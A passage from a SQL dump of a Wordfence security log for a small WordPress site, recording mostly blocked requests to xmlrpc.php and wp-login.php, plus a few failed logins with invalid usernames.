like Gecko) Chrome/36.0.1985.125 YaBrowser/14.8.1985.12054 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11118,0.000000,1631365392.767696,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11119,0.000000,1631366048.462578,'\0\0\0\0\0\0\0\0\0\0��4�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11120,0.000000,1631366706.806655,'\0\0\0\0\0\0\0\0\0\0��p�H�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11121,0.000000,1631367372.075803,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11122,0.000000,1631368001.068225,'\0\0\0\0\0\0\0\0\0\0��h�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11123,0.000000,1631368708.939349,'\0\0\0\0\0\0\0\0\0\0��)]R',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11124,0.000000,1631369384.631280,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11125,0.000000,1631370065.791526,'\0\0\0\0\0\0\0\0\0\0��l�7�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11126,0.000000,1631370749.998361,'\0\0\0\0\0\0\0\0\0\0���zR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11127,0.000000,1631371447.074048,'\0\0\0\0\0\0\0\0\0\0��g�|�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11128,0.000000,1631372134.975212,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11129,0.000000,1631372839.314764,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11130,0.000000,1631373521.823066,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11131,0.000000,1631374253.091630,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11132,0.000000,1631374253.391940,'\0\0\0\0\0\0\0\0\0\0��-wT�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11133,1631374374.151107,1631374374.052400,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11134,1631374344.590858,1631374344.494700,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11135,1631374312.176793,1631374312.077200,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11136,1631374282.042784,1631374281.642500,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11137,0.000000,1631374961.192959,'\0\0\0\0\0\0\0\0\0\0���� g',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11138,0.000000,1631375670.238117,'\0\0\0\0\0\0\0\0\0\0��m��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11139,0.000000,1631376366.024658,'\0\0\0\0\0\0\0\0\0\0��r��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11140,0.000000,1631377045.815134,'\0\0\0\0\0\0\0\0\0\0����2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11141,0.000000,1631377676.865569,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11142,0.000000,1631378256.750213,'\0\0\0\0\0\0\0\0\0\0��%���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11143,0.000000,1631378786.648962,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11144,0.000000,1631379260.468547,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11145,0.000000,1631379746.600468,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11146,0.000000,1631380220.055242,'\0\0\0\0\0\0\0\0\0\0��k� \Z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11147,0.000000,1631381205.253509,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11148,0.000000,1631381664.633168,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11149,0.000000,1631382183.501348,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11150,0.000000,1631388126.852120,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11151,0.000000,1631390331.423550,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11152,0.000000,1631392429.389919,'\0\0\0\0\0\0\0\0\0\0���k/�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11153,0.000000,1631392568.974805,'\0\0\0\0\0\0\0\0\0\0���贮',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11154,0.000000,1631396540.068381,'\0\0\0\0\0\0\0\0\0\0��H�*',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11155,0.000000,1631398543.964547,'\0\0\0\0\0\0\0\0\0\0��E�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11156,0.000000,1631400731.413537,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.76 YaBrowser/14.10.2062.9184 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11157,0.000000,1631401013.403126,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11158,0.000000,1631401775.735357,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11159,0.000000,1631402387.155306,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11160,0.000000,1631402563.348473,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11161,0.000000,1631403379.080997,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11162,0.000000,1631404238.934261,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11163,0.000000,1631404289.491451,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11164,0.000000,1631405045.767310,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11165,0.000000,1631405884.875233,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11166,0.000000,1631406280.734407,'\0\0\0\0\0\0\0\0\0\0��h�\Z',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11167,0.000000,1631407619.956308,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11168,0.000000,1631408200.553170,'\0\0\0\0\0\0\0\0\0\0��/� ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11169,0.000000,1631409370.752642,'\0\0\0\0\0\0\0\0\0\0��@�N�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11170,0.000000,1631410160.008045,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11171,0.000000,1631411134.910668,'\0\0\0\0\0\0\0\0\0\0��[�n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11172,0.000000,1631412055.992045,'\0\0\0\0\0\0\0\0\0\0��)]R',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11173,0.000000,1631412093.665147,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11174,0.000000,1631412924.540983,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11175,0.000000,1631413845.333579,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11176,0.000000,1631414080.500479,'\0\0\0\0\0\0\0\0\0\0��(E��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11177,0.000000,1631414655.175878,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11178,0.000000,1631415158.085421,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11179,0.000000,1631415621.844917,'\0\0\0\0\0\0\0\0\0\0����؛',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11180,0.000000,1631416063.474591,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11181,0.000000,1631416347.201188,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11182,0.000000,1631416627.670044,'\0\0\0\0\0\0\0\0\0\0��-w��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11183,0.000000,1631416825.922168,'\0\0\0\0\0\0\0\0\0\0��u�7�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11184,0.000000,1631416830.398221,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11185,0.000000,1631416837.838140,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11186,0.000000,1631416841.642069,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11187,0.000000,1631416845.549591,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11188,0.000000,1631416853.170047,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11189,0.000000,1631416857.765434,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11190,0.000000,1631416862.702976,'\0\0\0\0\0\0\0\0\0\0��ڛ�@',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11191,0.000000,1631416922.494265,'\0\0\0\0\0\0\0\0\0\0��#Ɖ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11192,0.000000,1631417207.744843,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11193,0.000000,1631417467.426581,'\0\0\0\0\0\0\0\0\0\0���C�h',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11194,0.000000,1631417778.636417,'\0\0\0\0\0\0\0\0\0\0���>M�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11195,0.000000,1631417867.386415,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11196,0.000000,1631418061.019476,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11197,0.000000,1631418308.461588,'\0\0\0\0\0\0\0\0\0\0����PC',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11198,0.000000,1631418575.241522,'\0\0\0\0\0\0\0\0\0\0��\\5`t',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11199,0.000000,1631418871.967379,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11200,0.000000,1631419142.014194,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11201,0.000000,1631419400.104685,'\0\0\0\0\0\0\0\0\0\0��@om�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11202,0.000000,1631419682.665248,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11203,0.000000,1631419770.641312,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11204,0.000000,1631419908.397474,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 